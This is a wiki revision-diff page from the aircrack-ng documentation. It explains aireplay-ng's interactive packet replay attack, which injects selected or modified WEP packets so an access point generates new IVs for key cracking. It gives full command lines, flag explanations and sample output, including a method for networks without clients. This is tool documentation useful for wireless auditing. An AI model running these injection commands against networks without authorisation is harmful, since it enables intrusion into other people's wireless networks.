User Tools

Site Tools


interactive_packet_replay

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
interactive_packet_replay [2007/01/02 23:13]
gerald Ethereal has changed its name to Wireshark.
interactive_packet_replay [2010/11/21 09:05] (current)
sleek typos
Line 1: Line 1:
 ====== Interactive packet replay ====== ====== Interactive packet replay ======
 +===== Description =====
  
-This attack allows you to choose a given packet for replaying; it sometimes gives more effective results than attack ​([ARP-request reinjection]).+This attack allows you to choose a specific ​packet for replaying ​(injecting). ​ The attack ​can obtain packets to replay from two sources. ​ The first being a live flow of packets from your wireless card.  The second being from a pcap file.  Standard Pcap format ​(Packet CAPture, associated with the libpcap library http://​www.tcpdump.org),​ is recognized by most commercial and open-source traffic capture and analysis tools. ​ Reading from a file is an often overlooked feature of aireplay-ng. ​ This allows you read packets from other capture sessions or quite often, various attacks generate pcap files for easy reuse. ​ A common use of reading ​ a file containing a packet your created with [[packetforge-ng]].
  
-You could use it, for example, to attempt ​the "any data re-broadcast"​ attack, which only works if the AP actually reencrypts WEP data packets:+In order to use the interactive packet replay successfullyit it important ​to understand a bit more about the wireless packet flow.  You cannot simply capture and replay ​any packet. ​ Only certain ​packets ​can be replayed successfully. ​ Successfully means that it is accepted by the access point and causes a new initialization vector (IV) to be generated since that is the whole objective.
  
-  aireplay-ng -2 -b 00:​13:​10:​30:​24:​9C -n 100 -p 0841 -h 00:​09:​5B:​EB:​C5:​2B -c FF:​FF:​FF:​FF:​FF:​FF ath0+To do this, we either have to select a packet which naturally will be successful or manipulate a captured packet into a natural one.  We will now explore these two concepts in more detail.
  
 +First, lets look at what characteristics a packet must have to naturally work.  Access points will always repeat packets destined for the broadcast MAC address. ​ This is a MAC address of FF:​FF:​FF:​FF:​FF:​FF. ​ ARP request packets have this characteristic. ​ As well, the packet must be going from a wireless client to the wired network. ​ This is a packet with the "To DS" (To Distribution System) bit flag set to 1.
  
-You can also use attack 2 to manually replay WEP-encrypted ARP request ​packets, which size is either 68 or 86 bytes (depending on the operating system):+So the aireplay-ng filter options we require to select these packets ​are:
  
-  ​aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:​FF:​FF:​FF:​FF:​FF -m 68 -n 68 -p 0841 -h 00:​09:​5B:​EB:​C5:​2B ath0+  ​-b 00:14:6C:7E:40:80 selects packets with the MAC of the access point we are interested in 
 +  * -d FF:​FF:​FF:​FF:​FF:​FF ​selects packets with a broadcast destination 
 +  * -t 1 selects packets with the "To Distribution System"​ flag set on
  
 +See "​Natural Packet Replay"​ below for an example.
  
-  aireplay-ng -2 -b 00:13:10:30:24:9C -FF:​FF:​FF:​FF:​FF:​FF -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0+Next, we will look at packets which need to be manipulated in order to be successfully replayed by the access point. ​ The objective, as always, is to have the access point rebroadcast the packet you inject and generate a new IV.  As simple as it sounds, the only selection criteria you need is the "-t 1" to select packets going to the distribution system (ethernet):​ 
 + 
 +  * -b 00:​14:​6C:​7E:​40:​80 selects packets with the MAC of the access point we are interested in 
 +  * -t 1 selects packets with the "To Distribution System"​ flag set on 
 + 
 +We don't care what the destination MAC address is.  This because in this case we will modify the packet being injected. ​ The following options will result in the packet looking like a "​natural"​ packet above. ​ Here are the options required: 
 + 
 +  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client to the access point. ​ IE Set the "To DS" field to 1. 
 +  * -c FF:​FF:​FF:​FF:​FF:​FF sets the destination MAC address to be a broadcast. ​ This is required to cause the AP to replay the packet and thus getting the new IV. 
 + 
 +See "​Modified Packet Replay"​ below for an example. 
 + 
 + 
 +===== Usage ===== 
 + 
 +aireplay-ng -2 <filter options> <replay options> -r <file name> <replay interface>​ 
 + 
 +Where: 
 + 
 +  * -2 means interactive replay attack 
 +  * <filter options> are described [[aireplay-ng#​usage|here]] 
 +  * <replay options> are described [[aireplay-ng#​usage|here]] 
 +  * -r <file name> used to specify a pcap file to read packets from (this is optional) 
 +  * <replay interface>​ is the wireless interface such ath0 
 + 
 +===== Usage Examples ===== 
 + 
 +==== Natural Packet Replay ==== 
 + 
 +For this example, you do not need do a fake authentication first, since the source MAC address is already associated with the access point. ​ The source MAC address is from the existing wireless client. 
 + 
 +Putting it all together: 
 + 
 +   aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:​FF:​FF:​FF:​FF:​FF -t 1 ath0 
 + 
 +Where: 
 + 
 +  * -2 means interactive replay 
 +  * -b 00:​14:​6C:​7E:​40:​80 selects packets with the MAC of the access point we are interested in 
 +  * -d FF:​FF:​FF:​FF:​FF:​FF selects packets with a broadcast destination 
 +  * -t 1 selects packets with the "To Distribution System"​ flag set on 
 +  * ath0 is the wireless interface 
 + 
 +When launched, the program will look as follows: 
 + 
 +   Read 4 packets... 
 +    
 +        Size: 68, FromDS: 0, ToDS: 1 (WEP) 
 +    
 +             ​BSSID ​ =  00:​14:​6C:​7E:​40:​80 
 +         Dest. MAC  =  FF:​FF:​FF:​FF:​FF:​FF 
 +        Source MAC  =  00:​0F:​B5:​34:​30:​30 
 +    
 +        0x0000: ​ 0841 de00 0014 6c7e 4080 000f b534 3030  .A....l~@....400 
 +        0x0010: ​ ffff ffff ffff 4045 d16a c800 6f4f ddef  ......@E.j..oO.. 
 +        0x0020: ​ b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162  ...|.*d....c..Ab 
 +        0x0030: ​ 8ad9 2f74 16bb abcf 232e 97ee 5e45 754d  ../​t....#​...^EuM 
 +        0x0040: ​ 23e0 883e                                #..> 
 + 
 +   Use this packet ? y 
 + 
 +Notice that the packet matches our selection criteria. ​ Enter "​y"​ and it starts injecting:​ 
 + 
 +   ​Saving chosen packet in replay_src-0315-191310.cap 
 +   You should also start airodump-ng to capture replies. 
 +    
 +   Sent 773 packets... 
 + 
 + 
 +==== Modified Packet Replay ==== 
 + 
 +For this example, you do not need do a fake authenticaion first, since the source MAC address is already associated with the access point. ​ The source MAC address is from the existing wireless client. 
 + 
 +Putting it all together: 
 + 
 +   ​aireplay-ng -2 -b 00:​14:​6C:​7E:​40:​80 -t 1 -c FF:​FF:​FF:​FF:​FF:​FF -p 0841 ath0 
 + 
 +Where: 
 + 
 +  * -2 means interactive replay 
 +  * -b 00:​14:​6C:​7E:​40:​80 selects packets with the MAC of the access point we are interested in. 
 +  * -t 1 selects packets with the "To Distribution System"​ flag set on 
 +  * -c FF:​FF:​FF:​FF:​FF:​FF sets the destination MAC address to be a broadcast. ​ This is required to cause the AP to replay the packet and thus getting the new IV. 
 +  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client. ​ IE Set the "To DS" field to 1. 
 +  * ath0 is the wireless interface 
 + 
 +The IVs generated per second will vary based on the size of the packet you select. ​ The smaller the packet size, the higher the rate per second. ​ When launched, the program will look as follows: 
 + 
 +   ​Read ​10 packets... 
 +    
 +        Size: 124, FromDS: 0, ToDS: 1 (WEP) 
 +    
 +             ​BSSID ​ =  00:​14:​6C:​7E:​40:​80 
 +         Dest. MAC  =  00:​40:​F4:​77:​E5:​C9 
 +        Source MAC  =  00:0F:B5:34:30:30 
 +    
 +        0x0000 0841 2c00 0014 6c7e 4080 000f b534 3030  .A,​...l~@....400 
 +        0x0010: ​ 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7  .@.w....=y...Y+. 
 +        0x0020: ​ 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc  ..........O...;​. 
 +        0x0030: ​ 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7  ..........X...{. 
 +        0x0040: ​ 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d  ..i...;​.Cj..v,​.. 
 +        0x0050: ​ 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913  zW?​=.<​.....emf.. 
 +        0x0060: ​ 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825  ....o..h+ U...% 
 +        0x0070: ​ bf22 960a 5c7b 3036 290a 89d6            ."​..\{06)... 
 +    
 +   Use this packet ? y 
 + 
 +Enter "​y"​ and the program will continue: 
 + 
 +   ​Saving chosen packet in replay_src-0316-162802.cap 
 +   You should also start airodump-ng to capture replies. 
 +    
 +   Sent 2966 packets... 
 + 
 + 
 +==== Other Examples ==== 
 + 
 +You could use it, for example, to have the access point (AP) rebroadcast the packet and thereby generate new initialization vectors (IVs): 
 + 
 +   ​aireplay-ng -2 -p 0841 -c FF:​FF:​FF:​FF:​FF:​FF -b 00:​14:​6C:​7E:​40:​80 -h 00:​0F:​B5:​88:​AC:​82 ​ ath0 
 + 
 +Where: 
 + 
 +  * -2 means the interactive replay attack 
 +  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client. ​ IE Set the "To DS" field to 1. 
 +  * -c FF:​FF:​FF:​FF:​FF:​FF sets the destination MAC address to be a broadcast. ​ This is required to cause the AP to replay the packet and thus getting the new IV. 
 +  * -b 00:​14:​6C:​7E:​40:​80 is the MAC address of the access point (BSSID). ​ This is a filter to select a single AP. 
 +  * -h 00:​0F:​B5:​88:​AC:​82 sets is the MAC address of the packets being transmitted and should match your card's MAC address. 
 +  *  ath0 is the wireless interface name. 
 + 
 +IMPORTANT: ​ In this example, we set the source MAC address of the packets. ​ This MAC address must be associated with the AP either via fake authentication or an existing wireless client. 
 + 
 +The IVs generated per second will vary based on the size of the packet you select. ​ The smaller the packet size, the higher the rate per second. ​ When launched, the program will look as follows: 
 + 
 +   Read 99 packets... 
 +    
 +        Size: 139, FromDS: 1, ToDS: 0 (WEP) 
 +    
 +             ​BSSID ​ =  00:​14:​6C:​7E:​40:​80 
 +         Dest. MAC  =  01:​00:​5E:​00:​00:​FB 
 +        Source MAC  =  00:​40:​F4:​77:​E5:​C9 
 +    
 +        0x0000: ​ 0842 0000 0100 5e00 00fb 0014 6c7e 4080  .B....^.....l~@. 
 +        0x0010: ​ 0040 f477 e5c9 5065 917f 0000 e053 b683  .@.w..Pe....S.. 
 +        0x0020: ​ fff3 795e 19a3 3313 b62c c9f3 c373 ef3e  ..y^..3..,​...s.>​ 
 +        0x0030: ​ 87a0 751a 7d20 9e6c 59af 4d53 16d8 773c  ..u.} .lY.MS..w<​ 
 +        0x0040: ​ af05 1021 8069 bbc8 06ea 59f3 3912 09a9  ...!.i....Y.9... 
 +        0x0050: ​ c36d 1db5 a51e c627 11d1 d18c 2473 fae9  .m.....'​....$s.. 
 +        0x0060: ​ 84c0 7afa 8b84 ebbb e4d2 4763 44ae 69ea  ..z.......GcD.i. 
 +        0x0070: ​ b65b df63 8893 279b 6ecf 1af8 c889 57f3  .[.c..'​.n.....W. 
 +        0x0080: ​ fea7 d663 21a6 3329 28c8 8f              ...c!.3)(.. 
 +    
 +   Use this packet ?  
 + 
 +Responding "​y"​ results in the packets being injected: 
 + 
 +   ​Saving chosen packet in replay_src-0303-103920.cap 
 +   You should also start airodump-ng to capture replies. 
 +    
 +   Sent 4772 packets... 
 + 
 +By also including packet size filters you can easily also use attack 2 to manually replay WEP-encrypted ARP request packets. ​ ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes: 
 + 
 +aireplay-ng -2 -p 0841 -m 68 -n 86 -b 00:​14:​6C:​7E:​40:​80 -c FF:​FF:​FF:​FF:​FF:​FF -h 00:​0F:​B5:​88:​AC:​82 ​ ath0 
 + 
 +Where: 
 + 
 +  * -2 means the interactive replay attack 
 +  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client. ​ IE Set the "To DS" field to 1. 
 +  * -m 68 is the minimum packet length 
 +  *  -n 86 is the maximum packet length  
 +  * -c FF:​FF:​FF:​FF:​FF:​FF sets the destination MAC address to be a broadcast. ​ This is required to cause the AP to replay the packet and thus getting the new IV. 
 +  * -b 00:​14:​6C:​7E:​40:​80 is the MAC address of the access point (BSSID). ​ This is a filter to select a single AP. 
 +  * -h 00:0F:B5:88:AC:82 sets is the MAC address of the packets being transmitted and should match your card's MAC address. 
 +  *  ​ath0 is the wireless interface name. 
 + 
 +IMPORTANT: ​ In this example, we set the source MAC address of the packets. ​ This MAC address must be associated with the AP either via fake authentication or an existing wireless client. 
 + 
 +Once you start the program it looks as follows: 
 + 
 +   Read 145 packets... 
 +    
 +        Size: 86, FromDS: 1, ToDS: 0 (WEP) 
 +    
 +             ​BSSID ​ =  00:​14:​6C:​7E:​40:​80 
 +         Dest. MAC  =  FF:​FF:​FF:​FF:​FF:​FF 
 +        Source MAC  =  00:​40:​F4:​77:​E5:​C9 
 +    
 +        0x0000: ​ 0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@. 
 +        0x0010: ​ 0040 f477 e5c9 9075 a09c 0000 d697 eb34  .@.w...u.......4 
 +        0x0020: ​ e880 9a37 8bda d0e7 fdb4 252d d235 313c  ...7......%-.51<​ 
 +        0x0030: ​ 16ab 784c 5a45 b147 fba2 fe90 ae26 4c9d  ..xLZE.G.....&​L. 
 +        0x0040: ​ 7d77 8b2f 1c70 1d6b 58f7 b3ac 9e7f 7e43  }w./​.p.kX....~C 
 +        0x0050: ​ 78ed eeb3 6cc4                           ​x...l. 
 +    
 +   Use this packet ? y 
 + 
 +At this point, only respond "​y"​ if the packet is 68 or 86 bytes long, otherwise enter "​n"​. ​ It now injects the packets: 
 + 
 +   ​Saving chosen packet in replay_src-0303-124624.cap 
 +   You should also start airodump-ng to capture replies. 
 + 
 +As mentioned earlier, aireplay-ng can be used to replay packets from a pcap file.  Notice in the previous example, aireplay-ng wrote a file called "​replay_src-0303-124624.cap"​. ​ You are not limited to using files written by aireplay-ng,​ you can use any pcap file from airodump-ng,​ kismet, etc. 
 + 
 +Here is an example using the output from the previous example: 
 + 
 +aireplay-ng -2 -p 0841 -b 00:​14:​6C:​7E:​40:​80 -h 00:​0F:​B5:​88:​AC:​82 -r replay_src-0303-124624.cap ath0 
 + 
 +Where: 
 + 
 +  * -2 means the interactive replay attack 
 +  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client. ​ IE Set the "To DS" field to 1. 
 +  * -c FF:​FF:​FF:​FF:​FF:​FF NOTE: This is not included because an ARP packet already has the destination MAC address set to broadcast. 
 +  * -b 00:​14:​6C:​7E:​40:​80 is the MAC address of the access point (BSSID). ​ This is a filter to select a single AP. 
 +  * -h 00:​0F:​B5:​88:​AC:​82 sets is the MAC address of the packets being transmitted and should match your card's MAC address. 
 +  *  ath0 is the wireless interface name. 
 + 
 +IMPORTANT: ​ In this example, we set the source MAC address of the packets. ​ This MAC address must be associated with the AP either via fake authentication or an existing wireless client. 
 + 
 +The program responds: 
 + 
 +        Size: 86, FromDS: 1, ToDS: 0 (WEP) 
 +    
 +             ​BSSID ​ =  00:​14:​6C:​7E:​40:​80 
 +         Dest. MAC  =  FF:​FF:​FF:​FF:​FF:​FF 
 +        Source MAC  =  00:​40:​F4:​77:​E5:​C9 
 +    
 +        0x0000: ​ 0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@. 
 +        0x0010: ​ 0040 f477 e5c9 9075 a09c 0000 d697 eb34  .@.w...u.......4 
 +        0x0020: ​ e880 9a37 8bda d0e7 fdb4 252d d235 313c  ...7......%-.51<​ 
 +        0x0030: ​ 16ab 784c 5a45 b147 fba2 fe90 ae26 4c9d  ..xLZE.G.....&​L. 
 +        0x0040: ​ 7d77 8b2f 1c70 1d6b 58f7 b3ac 9e7f 7e43  }w./​.p.kX....~C 
 +        0x0050: ​ 78ed eeb3 6cc4                           ​x...l. 
 +    
 +   Use this packet ? y 
 + 
 +You then say "​y"​ to select the packet. ​ It then starts to inject the packets: 
 + 
 +   ​Saving chosen packet in replay_src-0303-124624.cap 
 +   You should also start airodump-ng to capture replies. 
 +    
 +   End of file. 
 + 
 +===== Usage Tips ===== 
 + 
 + 
 + 
 + 
 +==== Additional Interactive Application ==== 
 + 
 +There are some interesting applications of the first example above. ​   It can be used to attack networks without any connected wireless clients. ​ Start the aireplay-ng attack per the example. ​ Now sit back and wait for any packet to be broadcast. ​ It does not matter what type.  Just say "​y"​ and bingo you are generating IVs.  The tradeoff is speed, big packets yield lower IVs per second. ​ The major advantages is it saves the steps of obtaining the xor stream (chopchop or fragmentation attacks), building a packet and launching relay attack. 
 + 
 +This would also work on APs with clients. ​ It would be faster since you don't have to wait for an ARP, any packet will do. 
 + 
 +IMPORTANT: ​ The source MAC address you use must first be associated with the AP via fake authentication. 
 + 
 +==== Injecting Management Frames ==== 
 + 
 +You can also inject management and control frames on a per frame basis with aireplay-ng. ​ You just need to specify a matching filter since the default one just allows wep data packets.  
 + 
 +Examples: 
 +  * Setting -v 8 -u 0 -w 0 allows you to send beacons frames. 
 +  * Setting -v 12 -u 1 -w 0 -m 10 -n 2000 sets a filter for control frames (in this case clear-to-send frames). 
 + 
 + 
 +===== Usage Troubleshooting ===== 
 + 
 +The most common problem is that you are not associated with the AP.  Either use a source MAC address of a client already associated with the AP or use [[fake authentication]]. 
 + 
 +Check the [[i_am_injecting_but_the_ivs_don_t_increase|I am injecting but the ivs don't increase tutorial]]. 
 + 
 +One situation that may affect interactive replay: Exception of wireless client separation option - http://​forum.aircrack-ng.org/​index.php?​topic=194 
 + 
 +Also see the general aireplay-ng troubleshooting ideas: [[aireplay-ng#​usage_troubleshooting|aireplay-ng usage troubleshooting]].
  
-Another good idea is to capture some traffic and then have a look at it with [[http://​www.wireshark.org/​|Wireshark]]. If two packets are looking like a request and a response (One client sends a packet and very short time later the receiver is answering to it) then it is a good idea to try to reinject the request packet to get answers. 
interactive_packet_replay.1167776013.txt.gz · Last modified: 2007/01/02 23:13 (external edit)